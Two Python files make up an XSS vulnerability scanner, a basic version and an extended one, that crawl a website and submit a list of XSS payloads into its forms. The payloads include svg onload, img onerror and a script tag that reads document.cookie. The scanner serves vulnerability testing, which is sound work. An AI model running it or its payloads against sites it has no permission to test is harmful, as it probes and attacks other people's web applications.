xss_scanner.py
import requests from pprint import pprint from bs4 import BeautifulSoup as bs from urllib.parse import urljoin def get_all_forms(url): """Given a `url`, it returns all forms from the HTML content""" soup = bs(requests.get(url).content, "html.parser") return soup.find_all("form") def get_form_details(form): """ This function extracts all possible useful information about an HTML `form` """ details = {} # get the form action (target url) action = form.attrs.get("action", "").lower() # get the form method (POST, GET, etc.) method = form.attrs.get("method", "get").lower() # get all the input details such as type and name inputs = [] for input_tag in form.find_all("input"): input_type = input_tag.attrs.get("type", "text") input_name = input_tag.attrs.get("name") inputs.append({"type": input_type, "name": input_name}) # put everything to the resulting dictionary details["action"] = action details["method"] = method details["inputs"] = inputs return details def submit_form(form_details, url, value): """ Submits a form given in `form_details` Params: form_details (list): a dictionary that contain form information url (str): the original URL that contain that form value (str): this will be replaced to all text and search inputs Returns the HTTP Response after form submission """ # construct the full URL (if the url provided in action is relative) target_url = urljoin(url, form_details["action"]) # get the inputs inputs = form_details["inputs"] data = {} for input in inputs: # replace all text and search values with `value` if input["type"] == "text" or input["type"] == "search": input["value"] = value input_name = input.get("name") input_value = input.get("value") if input_name and input_value: # if input name and value are not None, # then add them to the data of form submission data[input_name] = input_value print(f"[+] Submitting malicious payload to {target_url}") print(f"[+] Data: {data}") if form_details["method"] == "post": return requests.post(target_url, data=data) else: # GET request return requests.get(target_url, params=data) def scan_xss(url): """ Given a `url`, it prints all XSS vulnerable forms and returns True if any is vulnerable, False otherwise """ # get all the forms from the URL forms = get_all_forms(url) print(f"[+] Detected {len(forms)} forms on {url}.") js_script = "<Script>alert('hi')</scripT>" # returning value is_vulnerable = False # iterate over all forms for form in forms: form_details = get_form_details(form) content = submit_form(form_details, url, js_script).content.decode() if js_script in content: print(f"[+] XSS Detected on {url}") print(f"[*] Form details:") pprint(form_details) is_vulnerable = True # won't break because we want to print other available vulnerable forms return is_vulnerable if __name__ == "__main__": import sys url = sys.argv[1] print(scan_xss(url))
xss_scanner_extended.py
import requests # Importing requests library for making HTTP requests from pprint import pprint # Importing pprint for pretty-printing data structures from bs4 import BeautifulSoup as bs # Importing BeautifulSoup for HTML parsing from urllib.parse import urljoin, urlparse # Importing utilities for URL manipulation from urllib.robotparser import RobotFileParser # Importing RobotFileParser for parsing robots.txt files from colorama import Fore, Style # Importing colorama for colored terminal output import argparse # Importing argparse for command-line argument parsing # List of XSS payloads to test forms with XSS_PAYLOADS = [ '"><svg/onload=alert(1)>', '\'><svg/onload=alert(1)>', '<img src=x onerror=alert(1)>', '"><img src=x onerror=alert(1)>', '\'><img src=x onerror=alert(1)>', "';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//--></script>", "<Script>alert('XSS')</scripT>", "<script>alert(document.cookie)</script>", ] # global variable to store all crawled links crawled_links = set() def print_crawled_links(): """ Print all crawled links """ print(f"\n[+] Links crawled:") for link in crawled_links: print(f" {link}") print() # Function to get all forms from a given URL def get_all_forms(url): """Given a `url`, it returns all forms from the HTML content""" try: # Using BeautifulSoup to parse HTML content of the URL soup = bs(requests.get(url).content, "html.parser") # Finding all form elements in the HTML return soup.find_all("form") except requests.exceptions.RequestException as e: # Handling exceptions if there's an error in retrieving forms print(f"[-] Error retrieving forms from {url}: {e}") return [] # Function to extract details of a form def get_form_details(form): """ This function extracts all possible useful information about an HTML `form` """ details = {} # Extracting form action and method action = form.attrs.get("action", "").lower() method = form.attrs.get("method", "get").lower() inputs = [] # Extracting input details within the form for input_tag in form.find_all("input"): input_type = input_tag.attrs.get("type", "text") input_name = input_tag.attrs.get("name") inputs.append({"type": input_type, "name": input_name}) # Storing form details in a dictionary details["action"] = action details["method"] = method details["inputs"] = inputs return details # Function to submit a form with a specific value def submit_form(form_details, url, value): """ Submits a form given in `form_details` Params: form_details (list): a dictionary that contains form information url (str): the original URL that contains that form value (str): this will be replaced for all text and search inputs Returns the HTTP Response after form submission """ target_url = urljoin(url, form_details["action"]) # Constructing the absolute form action URL inputs = form_details["inputs"] data = {} # Filling form inputs with the provided value for input in inputs: if input["type"] == "text" or input["type"] == "search": input["value"] = value input_name = input.get("name") input_value = input.get("value") if input_name and input_value: data[input_name] = input_value try: # Making the HTTP request based on the form method (POST or GET) if form_details["method"] == "post": return requests.post(target_url, data=data) else: return requests.get(target_url, params=data) except requests.exceptions.RequestException as e: # Handling exceptions if there's an error in form submission print(f"[-] Error submitting form to {target_url}: {e}") return None def get_all_links(url): """ Given a `url`, it returns all links from the HTML content """ try: # Using BeautifulSoup to parse HTML content of the URL soup = bs(requests.get(url).content, "html.parser") # Finding all anchor elements in the HTML return [urljoin(url, link.get("href")) for link in soup.find_all("a")] except requests.exceptions.RequestException as e: # Handling exceptions if there's an error in retrieving links print(f"[-] Error retrieving links from {url}: {e}") return [] # Function to scan for XSS vulnerabilities def scan_xss(args, scanned_urls=None): """Given a `url`, it prints all XSS vulnerable forms and returns True if any is vulnerable, None if already scanned, False otherwise""" global crawled_links if scanned_urls is None: scanned_urls = set() # Checking if the URL is already scanned if args.url in scanned_urls: return # Adding the URL to the scanned URLs set scanned_urls.add(args.url) # Getting all forms from the given URL forms = get_all_forms(args.url) print(f"\n[+] Detected {len(forms)} forms on {args.url}") # Parsing the URL to get the domain parsed_url = urlparse(args.url) domain = f"{parsed_url.scheme}://{parsed_url.netloc}" if args.obey_robots: robot_parser = RobotFileParser() robot_parser.set_url(urljoin(domain, "/robots.txt")) try: robot_parser.read() except Exception as e: # Handling exceptions if there's an error in reading robots.txt print(f"[-] Error reading robots.txt file for {domain}: {e}") crawl_allowed = False else: crawl_allowed = robot_parser.can_fetch("*", args.url) else: crawl_allowed = True if crawl_allowed or parsed_url.path: for form in forms: form_details = get_form_details(form) form_vulnerable = False # Testing each form with XSS payloads for payload in XSS_PAYLOADS: response = submit_form(form_details, args.url, payload) if response and payload in response.content.decode(): print(f"\n{Fore.GREEN}[+] XSS Vulnerability Detected on {args.url}{Style.RESET_ALL}") print(f"[*] Form Details:") pprint(form_details) print(f"{Fore.YELLOW}[*] Payload: {payload} {Style.RESET_ALL}") # save to a file if output file is provided if args.output: with open(args.output, "a") as f: f.write(f"URL: {args.url}\n") f.write(f"Form Details: {form_details}\n") f.write(f"Payload: {payload}\n") f.write("-"*50 + "\n\n") form_vulnerable = True break # No need to try other payloads for this endpoint if not form_vulnerable: print(f"{Fore.MAGENTA}[-] No XSS vulnerability found on {args.url}{Style.RESET_ALL}") # Crawl links if the option is enabled if args.crawl: print(f"\n[+] Crawling links from {args.url}") try: # Crawling links from the given URL links = get_all_links(args.url) except requests.exceptions.RequestException as e: # Handling exceptions if there's an error in crawling links print(f"[-] Error crawling links from {args.url}: {e}") links = [] for link in set(links): # Removing duplicates if link.startswith(domain): crawled_links.add(link) if args.max_links and len(crawled_links) >= args.max_links: print(f"{Fore.CYAN}[-] Maximum links ({args.max_links}) limit reached. Exiting...{Style.RESET_ALL}") print_crawled_links() exit(0) # Recursively scanning XSS vulnerabilities for crawled links args.url = link link_vulnerable = scan_xss(args, scanned_urls) if not link_vulnerable: continue if __name__ == "__main__": parser = argparse.ArgumentParser(description="Extended XSS Vulnerability scanner script.") parser.add_argument("url", help="URL to scan for XSS vulnerabilities") parser.add_argument("-c", "--crawl", action="store_true", help="Crawl links from the given URL") # max visited links parser.add_argument("-m", "--max-links", type=int, default=0, help="Maximum number of links to visit. Default 0, which means no limit.") parser.add_argument("--obey-robots", action="store_true", help="Obey robots.txt rules") parser.add_argument("-o", "--output", help="Output file to save the results") args = parser.parse_args() scan_xss(args) # Initiating XSS vulnerability scan print_crawled_links()